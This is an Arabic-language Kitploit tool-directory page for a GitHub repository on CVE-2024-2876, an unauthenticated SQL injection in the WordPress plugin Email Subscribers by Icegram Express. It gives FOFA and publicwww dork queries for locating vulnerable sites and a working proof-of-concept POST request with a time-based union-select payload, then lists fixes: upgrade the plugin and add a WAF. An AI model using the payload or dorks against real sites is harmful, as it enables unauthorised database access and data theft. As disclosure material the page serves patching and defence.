Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-2876 | Kitploit
أدوات/GitHubGitHub/chsxthwik/cve-2024-2876
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubchsxthwik/cve-2024-2876

CVE-2024-2876

عرض المستودع
22منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-2876

#وصف الثغرة: إضافة Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce الخاصة بووردبريس معرّضة لثغرة SQL Injection عبر الدالة ‘run’ من الفئة ‘IG_ES_Subscribers_Query’ في جميع الإصدارات حتى 5.7.14 وما يشملها، وذلك بسبب عدم كفاية التهريب (escaping) للمعامل المقدَّم من المستخدم وعدم كفاية التحضير (preparation) لاستعلام SQL الموجود. وهذا يتيح للمهاجمين غير المصادقين (unauthenticated) إلحاق استعلامات SQL إضافية بالاستعلامات الموجودة بالفعل، والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#POC على يوتيوب: https://www.youtube.com/watch?v=eDEGt_yXyvE

#كيفية الإصلاح؟ نظرًا لأن جميع الإصدارات حتى 5.7.14 تم اكتشاف إصابتها بـ CVE، يُنصح المستخدمون بترقية إضافة Email Subscribers by Icegram Express إلى الإصدار 5.7.15 (أو أحدث إصدار 5.7.19). يمكن لمستخدمي Patchstack تفعيل التحديثات التلقائية خصيصًا للإضافات المعرضة للخطر. قم بتنفيذ حل WAF/WAAP كطبقة حماية إضافية. ميزة هذه الحلول هي أنه حتى لو كانت الثغرة جديدة وغير معروفة (0-day)، فقد تمنع الهجمات عبر اكتشاف أنماط وتقنيات الاستغلال.

#المصدر: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

تنزيل الأداة